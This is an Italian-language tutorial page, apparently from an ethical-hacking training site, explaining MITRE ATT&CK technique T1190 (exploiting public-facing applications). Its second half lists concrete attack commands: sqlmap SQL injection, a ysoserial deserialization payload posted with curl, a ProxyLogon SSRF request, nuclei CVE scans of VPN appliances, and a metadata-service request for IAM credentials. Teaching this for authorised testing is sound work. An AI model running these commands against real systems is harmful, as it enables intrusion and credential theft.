Exploit Public-Facing: Exploit Public-Facing Application (T1190)
Lo sfruttamento di applicazioni esposte a Internet rappresenta una delle tecniche più efficaci per ottenere l'accesso iniziale a una rete target. Questa metodologia si basa sull'identificazione e lo sfruttamento di vulnerabilità in servizi web, database, protocolli di gestione e qualsiasi sistema con socket aperti accessibili da Internet.
La tecnica appartiene alla tattica TA0001 (Initial Access) del framework ATT&CK, posizionandosi nella fase iniziale della kill chain quando l'attaccante cerca di stabilire il primo punto d'appoggio nella rete vittima. Con 42 gruppi APT documentati che utilizzano questa tecnica, 19 campagne identificate e 8 software specializzati, l'impatto di questa metodologia è significativo nel panorama delle minacce moderne.
Le vulnerabilità sfruttate spaziano da bug software e configurazioni errate a glitch temporanei nei sistemi. I target includono server web, database SQL, servizi standard come SMB e SSH, protocolli di gestione come SNMP, infrastrutture VMware ESXi e appliance di edge network. La crescente adozione di infrastrutture cloud e containerizzate ha ulteriormente ampliato la superficie d'attacco, permettendo agli attaccanti di compromettere istanze sottostanti o sfruttare debolezze nelle policy di gestione delle identità.
Per replicare efficacemente questi attacchi in ambiente controllato, inizia con l'identificazione delle vulnerabilità utilizzando sqlmap per automatizzare l'exploit di SQL injection: sqlmap -u "http://target.com/page.php?id=1" --batch --risk=3 --level=5. Questo comando esegue test approfonditi contro il parametro specificato.
Quando testi vulnerabilità di deserializzazione Java, genera payload serializzati con ysoserial:
java -jar ysoserial.jar CommonsCollections1 'cmd /c calc.exe' > payload.bin
curl -X POST http://target:8080/api/upload -H "Content-Type: application/octet-stream" --data-binary @payload.bin
Per simulare l'exploit di ProxyLogon contro Exchange, utilizza questa sequenza che sfrutta la SSRF per ottenere il LegacyDN:
curl -k -X POST https://exchange.target.com/owa/auth.owa -d 'destination=https://exchange.target.com/autodiscover/autodiscover.xml&flags=0&username=test'
Successivamente puoi utilizzare il token ottenuto per eseguire comandi PowerShell attraverso l'ECP.
Quando simuli attacchi contro appliance VPN, concentrati su endpoint noti come /dana-na/auth/url_default/welcome.cgi per Pulse Secure o /remote/login per Fortinet. Il tool nuclei può automatizzare questi test: nuclei -u https://vpn.target.com -t cves/ -severity critical,high -o results.txt.
Per ambienti containerizzati, testa l'accesso al metadata service dopo aver ottenuto l'esecuzione iniziale:
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
Questo permette di verificare se è possibile escalare i privilegi attraverso le credenziali del ruolo IAM associato.
Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo